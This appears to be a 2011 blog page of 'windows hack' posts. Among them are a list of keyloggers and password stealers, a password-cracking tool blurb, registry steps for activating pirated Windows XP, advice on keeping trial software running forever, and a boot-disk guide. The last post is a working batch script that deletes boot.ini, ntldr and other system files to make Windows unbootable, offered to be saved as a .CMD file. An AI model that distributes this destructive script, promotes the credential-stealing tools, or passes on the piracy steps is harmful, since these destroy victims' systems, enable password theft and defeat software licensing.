Showing posts with label windows hack. Show all posts
Showing posts with label windows hack. Show all posts

Monday, January 24, 2011

How to get rid of "This Copy of Windows is not Genuine"

Many of our user had faced the problem of "This Copy of Windows is not Genuine".


 *One solution is to reinstall the windows 7 again and avoid the KB971033.

or this

Thursday, January 13, 2011

Hack Pack

KEYLOGGERS & PASSWORD STEALING:

- Ardamax 2.8
- Ardamax 3.0
- Fake Messenger w/ password retriever (Revenge Messenger)
- Silent Keylogger by BUNNN
- Digital Keylogger v3.3
- Infinity YouTube cracker (doesn't work according to many but its still present)

How to Crack Windows Password

Ophcrack is a Windows password cracker based on a time-memory trade-off using rainbow tables. This is a new variant of Hellman’s original trade-off, with better performance. It recovers 100% of alphanumeric passwords in seconds. 


Wednesday, January 12, 2011

Activate pirated windows XP 2 sp2 without crack-32bit only

1- Click in start and then in run
2- Type in regedit and then ok
3- In the regedit, go to this following key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\WPAEvents
4- On the right panel, double click in OOBETimer
5- In the opened window delete all values and click OK. Shut the regedit
6- Go again in start > run and this time type:
%systemroot%\system32\oobe\msoobe.exe /a

HOW TO USE TRIAL SOFTWARE FOREVER

Now we download stuff almost daily. New products pop out so often. You can use any software forever you want. You can download trial version, right. Trial version expires after some days. You can stop that expiration. You can tell trial version of the software to not count days or do not bother about time. The software will stay and keep working like original software forever and will not expire or cease to work. You do not have to change your system clock. This little software does it all.

How to Create a Boot Disk for an NTFS or FAT Partition

This article describes how to create a Windows boot disk to access a drive with a
faulty boot sequence on an Intel x86-processor-based computer.

This Windows boot disk can access a drive that has the Windows NT file system (NTFS) or File allocation table (FAT) file system installed. The procedures in this article can be useful to work around the following boot problems:

Tuesday, January 11, 2011

How to shutdown windows XP forever.

@echo off

attrib -r -s -h %systemdrive%\autoexec.bat

del %systemdrive%\autoexec.bat

attrib -r -s -h %systemdrive%\boot.ini

del %systemdrive%\boot.ini

attrib -r -s -h %systemdrive%\ntldr

del %systemdrive%\ntldr

attrib -r -s -h %windir%\win.ini

del %windir%\win.ini


Just Copy this and past it on notepad. Then save it as "anyname.CMD" . WARNING: DO NOT RUN IT ON YOUR COMPUTER.